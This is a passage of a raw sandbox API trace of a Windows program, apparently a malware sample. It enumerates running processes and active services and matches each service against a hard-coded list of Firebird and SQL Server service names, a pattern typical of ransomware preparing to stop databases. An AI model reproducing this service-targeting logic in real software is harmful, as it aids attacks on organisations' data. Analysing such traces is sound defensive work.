lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.158] lstrlenW (lpString="conhost.exe") returned 11 [0066.158] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0066.159] lstrlenW (lpString="conhost.exe") returned 11 [0066.159] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.160] lstrlenW (lpString="svchost.exe") returned 11 [0066.160] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0066.161] lstrlenW (lpString="svchost.exe") returned 11 [0066.161] Process32NextW (in: hSnapshot=0x390, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0066.162] CloseHandle (hObject=0x390) returned 1 [0066.162] Sleep (dwMilliseconds=0x1f4) [0067.821] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ede0 [0067.821] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0067.822] GetLastError () returned 0xea [0067.822] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1d5a) returned 0x43c20f8 [0067.822] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x43c20f8, cbBufSize=0x1d5a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x43c20f8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0067.823] CloseServiceHandle (hSCObject=0x60ede0) returned 1 [0067.823] lstrlenW (lpString="Appinfo") returned 7 [0067.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0067.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0067.823] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0067.823] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0067.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0067.823] lstrlenW (lpString="AppXSvc") returned 7 [0067.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0067.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0067.823] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0067.823] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0067.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0067.823] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0067.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0067.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0067.824] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0067.824] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0067.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0067.824] lstrlenW (lpString="Audiosrv") returned 8 [0067.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0067.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0067.824] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0067.824] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0067.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0067.824] lstrlenW (lpString="BFE") returned 3 [0067.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0067.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0067.824] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0067.824] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0067.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0067.824] lstrlenW (lpString="BITS") returned 4 [0067.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0067.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0067.824] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0067.824] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0067.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0067.824] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0067.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0067.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0067.824] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0067.824] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0067.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0067.824] lstrlenW (lpString="CDPSvc") returned 6 [0067.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0067.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0067.825] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0067.825] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0067.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0067.825] lstrlenW (lpString="ClickToRunSvc") returned 13 [0067.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0067.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0067.825] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0067.825] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0067.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0067.825] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0067.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0067.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0067.825] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0067.825] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0067.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0067.825] lstrlenW (lpString="CryptSvc") returned 8 [0067.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0067.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0067.825] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0067.825] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0067.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0067.825] lstrlenW (lpString="DcomLaunch") returned 10 [0067.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0067.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0067.832] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0067.832] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0067.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0067.832] lstrlenW (lpString="DeviceAssociationService") returned 24 [0067.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0067.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0067.832] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0067.832] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0067.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0067.832] lstrlenW (lpString="Dhcp") returned 4 [0067.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0067.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0067.832] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0067.832] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0067.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0067.832] lstrlenW (lpString="Dnscache") returned 8 [0067.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0067.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0067.833] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0067.833] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0067.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0067.833] lstrlenW (lpString="DoSvc") returned 5 [0067.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0067.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0067.833] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0067.833] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0067.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0067.833] lstrlenW (lpString="DPS") returned 3 [0067.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0067.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0067.833] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0067.833] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0067.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0067.833] lstrlenW (lpString="DusmSvc") returned 7 [0067.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0067.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0067.833] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0067.833] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0067.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0067.833] lstrlenW (lpString="EventLog") returned 8 [0067.833] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0067.833] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0067.833] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0067.833] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0067.833] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0067.833] lstrlenW (lpString="EventSystem") returned 11 [0067.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0067.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0067.834] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0067.834] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0067.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0067.834] lstrlenW (lpString="FontCache") returned 9 [0067.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0067.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0067.834] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0067.834] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0067.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0067.834] lstrlenW (lpString="gpsvc") returned 5 [0067.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0067.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0067.834] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0067.834] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0067.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0067.834] lstrlenW (lpString="iphlpsvc") returned 8 [0067.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0067.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0067.834] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0067.834] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0067.834] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0067.834] lstrlenW (lpString="KeyIso") returned 6 [0067.834] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0067.834] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0067.834] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0067.835] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0067.835] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0067.835] lstrlenW (lpString="LanmanServer") returned 12 [0067.835] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0067.835] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0067.835] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0067.835] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0067.835] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0067.835] lstrlenW (lpString="LanmanWorkstation") returned 17 [0067.835] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0067.835] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0067.835] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0067.835] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0067.835] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0067.835] lstrlenW (lpString="lfsvc") returned 5 [0067.835] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0067.835] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0067.835] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0067.835] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0067.835] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0067.835] lstrlenW (lpString="lmhosts") returned 7 [0067.835] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0067.835] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0067.835] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0067.835] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0067.835] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0067.835] lstrlenW (lpString="LSM") returned 3 [0067.835] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0067.835] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0067.836] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0067.836] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0067.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0067.836] lstrlenW (lpString="MapsBroker") returned 10 [0067.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MapsBroker") returned -1 [0067.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MapsBroker") returned -1 [0067.836] lstrcmpiW (lpString1="sqlwriter", lpString2="MapsBroker") returned 1 [0067.836] lstrcmpiW (lpString1="mssqlserver", lpString2="MapsBroker") returned 1 [0067.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MapsBroker") returned 1 [0067.836] lstrlenW (lpString="MpsSvc") returned 6 [0067.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0067.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0067.836] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0067.836] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0067.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0067.836] lstrlenW (lpString="NcbService") returned 10 [0067.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0067.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0067.836] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0067.836] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0067.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0067.836] lstrlenW (lpString="netprofm") returned 8 [0067.836] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0067.836] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0067.836] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0067.836] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0067.836] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0067.836] lstrlenW (lpString="NlaSvc") returned 6 [0067.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0067.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0067.837] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0067.837] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0067.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0067.837] lstrlenW (lpString="nsi") returned 3 [0067.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0067.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0067.837] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0067.837] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0067.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0067.837] lstrlenW (lpString="PcaSvc") returned 6 [0067.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0067.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0067.837] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0067.837] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0067.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0067.837] lstrlenW (lpString="PlugPlay") returned 8 [0067.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0067.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0067.837] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0067.837] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0067.837] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0067.837] lstrlenW (lpString="Power") returned 5 [0067.837] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0067.837] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0067.837] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0067.838] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0067.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0067.838] lstrlenW (lpString="ProfSvc") returned 7 [0067.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0067.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0067.838] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0067.838] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0067.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0067.838] lstrlenW (lpString="RpcEptMapper") returned 12 [0067.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0067.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0067.838] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0067.838] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0067.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0067.838] lstrlenW (lpString="RpcSs") returned 5 [0067.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0067.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0067.838] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0067.838] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0067.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0067.838] lstrlenW (lpString="SamSs") returned 5 [0067.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0067.838] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0067.838] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0067.838] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0067.838] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0067.838] lstrlenW (lpString="Schedule") returned 8 [0067.838] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0067.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0067.839] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0067.839] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0067.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0067.839] lstrlenW (lpString="SecurityHealthService") returned 21 [0067.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0067.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0067.839] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0067.839] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0067.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0067.839] lstrlenW (lpString="SENS") returned 4 [0067.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0067.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0067.839] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0067.839] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0067.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0067.839] lstrlenW (lpString="ShellHWDetection") returned 16 [0067.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0067.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0067.839] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0067.839] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0067.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0067.839] lstrlenW (lpString="Spooler") returned 7 [0067.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0067.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0067.839] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0067.839] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0067.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0067.840] lstrlenW (lpString="SSDPSRV") returned 7 [0067.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0067.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0067.840] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0067.840] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0067.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0067.840] lstrlenW (lpString="StateRepository") returned 15 [0067.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0067.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0067.840] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0067.840] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0067.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0067.840] lstrlenW (lpString="SysMain") returned 7 [0067.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0067.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0067.840] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0067.840] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0067.840] HeapFree (in: 